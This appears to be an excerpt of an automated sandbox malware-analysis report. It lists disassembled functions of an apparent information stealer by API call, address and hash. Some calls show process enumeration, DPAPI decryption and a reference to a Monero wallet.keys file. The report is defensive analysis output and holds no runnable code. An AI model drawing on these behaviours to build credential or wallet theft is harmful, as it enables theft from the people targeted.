                                  • Opcode Fuzzy Hash: 4acc1d2df7cd87044bf7ac43df961875be12abe868bd1c05589977c81c49554b
                                  • Instruction Fuzzy Hash: 100140B5B44208FBDB20DFD4DD46F9E7778AB44700F104145FB45BB2C4C6B5AA008BA4
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E5961E
                                  • Process32First.KERNEL32(00E60ACA,00000128), ref: 00E59632
                                  • Process32Next.KERNEL32(00E60ACA,00000128), ref: 00E59647
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00E5965C
                                  • CloseHandle.KERNEL32(00E60ACA), ref: 00E5967A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: ba30e878712840dcb806fc93c6f168384dc7843901eafd4f06f4cda272bb28bb
                                  • Instruction ID: 8752b7217c5b6452f45ecfc2edf30d7dc06fdc15e5cce0dfbdc64fa9ee4caa48
                                  • Opcode Fuzzy Hash: ba30e878712840dcb806fc93c6f168384dc7843901eafd4f06f4cda272bb28bb
                                  • Instruction Fuzzy Hash: 92017175A10208EBCB20DFA4C848BEDBBF8FF08301F104589A946A7240D7799B48DF50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !~}~$.{K$i7$ti?w$v]m
                                  • API String ID: 0-2759975825
                                  • Opcode ID: 61b607db957c19a0acfc60b4a4f12f5db2834b4f0cf754d375b2ade28b55d585
                                  • Instruction ID: 9b6ef43cd8ffe009dd006265b2fd6903724df1383b89850874da8fe1b6274a5e
                                  • Opcode Fuzzy Hash: 61b607db957c19a0acfc60b4a4f12f5db2834b4f0cf754d375b2ade28b55d585
                                  • Instruction Fuzzy Hash: 9C3259F360C204AFE308AE2DEC9577ABBE5EB94320F15863DEAC4C7744E93558018796
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00E605B7), ref: 00E586CA
                                  • Process32First.KERNEL32(?,00000128), ref: 00E586DE
                                  • Process32Next.KERNEL32(?,00000128), ref: 00E586F3
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • CloseHandle.KERNEL32(?), ref: 00E58761
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: e31a5b3060ba4856ed12f999ae7b4ea3043793bcfb8cf1042eb5fb8b39a9648b
                                  • Instruction ID: 119dbc5f5bbf38287f0761062e2ad06329fb3b635ff409236bb3a9edaee48f15
                                  • Opcode Fuzzy Hash: e31a5b3060ba4856ed12f999ae7b4ea3043793bcfb8cf1042eb5fb8b39a9648b
                                  • Instruction Fuzzy Hash: 00314F71901218EBCB24DF54DC45FEEB7B8FB49701F1056AAF90AB2190DB346A49CFA1
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00E45184,40000001,00000000,00000000,?,00E45184), ref: 00E58EC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: a41c019ca999140bc1061efe67c5c22e2f32e4627de679263f52b89180ba0dd3
                                  • Instruction ID: b0dcfa6239174fe6bf1c7bf5d66e252823fa6b9635bcde0ae57603dcb72d04c3
                                  • Opcode Fuzzy Hash: a41c019ca999140bc1061efe67c5c22e2f32e4627de679263f52b89180ba0dd3
                                  • Instruction Fuzzy Hash: 01110A70304208EFDB04CF64DD85FAA33A9AF89319F10A848FD59AB244DB35EC45DB60
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E60E00,00000000,?), ref: 00E579B0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E579B7
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00E60E00,00000000,?), ref: 00E579C4
                                  • wsprintfA.USER32 ref: 00E579F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: f4aa8f7a1e1587b32247805f8b7200a3e6d941e43cc4f9e5bc5a34858c8547da
                                  • Instruction ID: 08d80b00bf361ce62bb3857a22bea02790d3f26882cff40736bd53eb742d2712
                                  • Opcode Fuzzy Hash: f4aa8f7a1e1587b32247805f8b7200a3e6d941e43cc4f9e5bc5a34858c8547da
                                  • Instruction Fuzzy Hash: D51118B2A08118EACB249FC9D945BBEB7F8EB4CB11F10451AF685A2684D63D5940C7B0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,01CBE9A8,00000000,?,00E60E10,00000000,?,00000000,00000000), ref: 00E57A63
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E57A6A
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,01CBE9A8,00000000,?,00E60E10,00000000,?,00000000,00000000,?), ref: 00E57A7D
                                  • wsprintfA.USER32 ref: 00E57AB7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: 6b624108493799ff4640eb52357740273fc9c501ed0c3c0ef197544b646349ca
                                  • Instruction ID: e84c9acffb60fee05c6fe77d846fd87763984288645bc16377506a2bcb220ee4
                                  • Opcode Fuzzy Hash: 6b624108493799ff4640eb52357740273fc9c501ed0c3c0ef197544b646349ca
                                  • Instruction Fuzzy Hash: C91182B1A49218DBDB208B54DC45F99B778F704721F104796E946A32C0C7781E54CF50
                                  APIs
                                  • CoCreateInstance.COMBASE(00E5E118,00000000,00000001,00E5E108,00000000), ref: 00E53758
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00E537B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: 520f6caf141561544f4959666ee4a648e86328c67fa98e565bc1e0d83bb27328
                                  • Instruction ID: 6c44a3053d0aec1690c8bbd651907636af1c449d092499ce796eff30b98dd4e9
                                  • Opcode Fuzzy Hash: 520f6caf141561544f4959666ee4a648e86328c67fa98e565bc1e0d83bb27328
                                  • Instruction Fuzzy Hash: 4F410771A00A289FDB28DB58CC94B9BB7B5BB48702F4055D8E609E72D0E771AE85CF50
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E49B84
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E49BA3
                                  • LocalFree.KERNEL32(?), ref: 00E49BD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: ab39f4229d97cd29e7f602d87fc5b8271d5e60d862f1406477809bfc249e90b6
                                  • Instruction ID: 1fdd0b5ec9eeb576e2c16659bbcc3cfe2fe2ce72bccdc4258add465e97f564fa
                                  • Opcode Fuzzy Hash: ab39f4229d97cd29e7f602d87fc5b8271d5e60d862f1406477809bfc249e90b6
                                  • Instruction Fuzzy Hash: C21109B8A00209EFCB04DF94D985AAEB7B5FF88300F104599E855A7344D775AE10CFA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ~2^$|7J
                                  • API String ID: 0-2527045163
                                  • Opcode ID: 81ef113b4892cdd65318fa46419245b08200377ffef2f35962dce3349a0f0883
                                  • Instruction ID: e9eecc182e3db7ad8a5606063da7a0dba3e6166ad7caa20f4c35859502ac37ec
                                  • Opcode Fuzzy Hash: 81ef113b4892cdd65318fa46419245b08200377ffef2f35962dce3349a0f0883
                                  • Instruction Fuzzy Hash: D3B203F390C2149FE304AE29EC8567ABBE9EF94720F16493DEAC4C3744EA3558418793
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 6_s$+xl
                                  • API String ID: 0-3448275489
                                  • Opcode ID: 5b93619212720a487a564321c058c25581d31f8b90c42024c06a5d8d7bdde061
                                  • Instruction ID: 0c5542bb15cedd0d353b6629710a7e24d17683b8867869aa4eead3f53814d031
                                  • Opcode Fuzzy Hash: 5b93619212720a487a564321c058c25581d31f8b90c42024c06a5d8d7bdde061
                                  • Instruction Fuzzy Hash: 0EB2F8F3A082049FE304AE2DEC8567AFBE5EF94720F1A453DEAC4C3744E63558158697
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E615B8,00E60D96), ref: 00E4F71E
                                  • StrCmpCA.SHLWAPI(?,00E615BC), ref: 00E4F76F
                                  • StrCmpCA.SHLWAPI(?,00E615C0), ref: 00E4F785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4FAB1
                                  • FindClose.KERNEL32(000000FF), ref: 00E4FAC3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: b14ec3cb64f64cf45923836c01a7f51de4629b26966d2d61be8cfe0f58c75f46
                                  • Instruction ID: ef8740f52c2910ff98ef2be27c2feb47d97976ddc7fa6f66566177c540508f13
                                  • Opcode Fuzzy Hash: b14ec3cb64f64cf45923836c01a7f51de4629b26966d2d61be8cfe0f58c75f46
                                  • Instruction Fuzzy Hash: 0B11753180411D9BDB18EB60EC599ED73B8AF10301F445BBAA91A67492EF302B4EC792
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: fag;
                                  • API String ID: 0-3987456656
                                  • Opcode ID: f853d83219a1214908cfce307361d0eb6fa7facba4bbd5c473b6717dfe787296
                                  • Instruction ID: dcffcbae420370c76b3d9dbec14817b93d2283b503de2fc3778581d4e3e266ec
                                  • Opcode Fuzzy Hash: f853d83219a1214908cfce307361d0eb6fa7facba4bbd5c473b6717dfe787296
                                  • Instruction Fuzzy Hash: 3B717BF3E182085BE3046D29DC897BAFAD6EBD4320F1F463DDBC997380E87958054296
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: i>v
                                  • API String ID: 0-3125800013
                                  • Opcode ID: 42ec717cc9a8388b6c99f9a3ae40737a6675b38e7330ffe7ca8270cc17d17921
                                  • Instruction ID: ceffc669c5a8ee904b39349109f5b49ba45243ceda39e059b427108b13a61afd
                                  • Opcode Fuzzy Hash: 42ec717cc9a8388b6c99f9a3ae40737a6675b38e7330ffe7ca8270cc17d17921
                                  • Instruction Fuzzy Hash: 556129F3A082049BF3086E2DDC8577AF7D5EBD4320F1A463DEAC593784E93968058696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: R|Zv
                                  • API String ID: 0-3835291862
                                  • Opcode ID: 38aeabde7d4f7eb3b633311dda8277d681582a5a277e516484052009589333b1
                                  • Instruction ID: 41cc28d817cf70feb984a4ef0c87829da78a4eec1c301042123866ac9f759d9c
                                  • Opcode Fuzzy Hash: 38aeabde7d4f7eb3b633311dda8277d681582a5a277e516484052009589333b1
                                  • Instruction Fuzzy Hash: 9B51B0B3D082148FE304AE6CDC4537AB7E5EB54310F2A493DE9C8D3784EA7958448B96
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: @ww
                                  • API String ID: 0-848741344
                                  • Opcode ID: 91835224af7b34e4a324bf0532c15c9f6f9758eb9e11ba89deb6885b1717cc2f
                                  • Instruction ID: 2c76687a2e357605c4a0736f02264611c737a3b2e211f25914df648dea15e218
                                  • Opcode Fuzzy Hash: 91835224af7b34e4a324bf0532c15c9f6f9758eb9e11ba89deb6885b1717cc2f
                                  • Instruction Fuzzy Hash: C55145B3A082145BE3086A2DDC1937ABBE6DBC0720F2A463DDB95977C4E938580586D6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: CjZo
                                  • API String ID: 0-1895608110
                                  • Opcode ID: aeba2ee32d5a9570889c27599b28dc65ab39013b21254d5954fe0619df401548
                                  • Instruction ID: 4ce6140948f8bd0637be9f597b6156559cc566afdf9489e5af9fb176d288ce25
                                  • Opcode Fuzzy Hash: aeba2ee32d5a9570889c27599b28dc65ab39013b21254d5954fe0619df401548
                                  • Instruction Fuzzy Hash: EE5129F3E182009BE3046A28DD4977BB7D6DBD4320F2A863DEBC893784D93D4C458696
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1bf4c8bb9e18d55097cfe061fd85202d3f538a393b97dfbb2bd1f62b800605c4
                                  • Instruction ID: 383a6aeaf43a08e72b0c3341612b9b5fb2a82f256cfe7c5214b5476b5376d988
                                  • Opcode Fuzzy Hash: 1bf4c8bb9e18d55097cfe061fd85202d3f538a393b97dfbb2bd1f62b800605c4
                                  • Instruction Fuzzy Hash: 41F114F390C2149FD304AE2DEC856BABBE9EF94720F1A4A2DE9C5D3740E63558448787
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 90df8d3a2594b5e6bd267f6ab6eeed66880bb1de5f6c72cbb0987a7c1df8b1e3
                                  • Instruction ID: 8d1a8c890af9317b417c12aa1bc58f92d3afd1b65e484c6011614b68aec165ac
                                  • Opcode Fuzzy Hash: 90df8d3a2594b5e6bd267f6ab6eeed66880bb1de5f6c72cbb0987a7c1df8b1e3
                                  • Instruction Fuzzy Hash: FA7139F3E082145FF3145E29ECC57BAF7D9EB98320F1A463EEA8493784D9791C058692
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ce362473a81ed0bd5a4b957e15dbf52c6a17b6cfbe0d6bdbcabfb5ace82bcca2
                                  • Instruction ID: 662df741f97d18b2b1d05d8b4e1e02277ffabde377d6bb84f3432b2bfcda5232
                                  • Opcode Fuzzy Hash: ce362473a81ed0bd5a4b957e15dbf52c6a17b6cfbe0d6bdbcabfb5ace82bcca2
                                  • Instruction Fuzzy Hash: 495127F3E042145BF3009E2DDC8572AB7E6EBE4720F2B853DEAC8D3744E97599058692
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bd7255747054fafbbab3aed6ddab902484e890b2b94ebeb55828602beeed4d5f
                                  • Instruction ID: 5f52d82ef1dc5c77f2115ecd53d89ead8a26971116ab2b470ed399f09ad269f3
                                  • Opcode Fuzzy Hash: bd7255747054fafbbab3aed6ddab902484e890b2b94ebeb55828602beeed4d5f
                                  • Instruction Fuzzy Hash: D751E1B3D482249FE3147A68DC4576ABBE9EF58720F1B093CDAD897380E679184086C7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 95d4adf3f7773cd8cb8b62aeb13e64cebafbf77f126984b5f02a843efccba468
                                  • Instruction ID: 68003c6251874fde7d4d27d1e0c30d0e58dae87796cdf53569114e46e5c3b126
                                  • Opcode Fuzzy Hash: 95d4adf3f7773cd8cb8b62aeb13e64cebafbf77f126984b5f02a843efccba468
                                  • Instruction Fuzzy Hash: C4415BB3E082149BE3082E2CDC953BAB7D5EB54320F2B053DDA89D7780E9394D0187C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ce2edd47a5016d0291367b3cefce158c1e612958b10184052f59f23fa0ec3265
                                  • Instruction ID: b31b23c766b494754fc978b0a2aa7d77ad01b69251b16aa638431a456e0ae8ea
                                  • Opcode Fuzzy Hash: ce2edd47a5016d0291367b3cefce158c1e612958b10184052f59f23fa0ec3265
                                  • Instruction Fuzzy Hash: A83136B3A3E2289FD2507D58DC87676F3D8DB05250F46063EDA87D77C0E5E1682282C2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
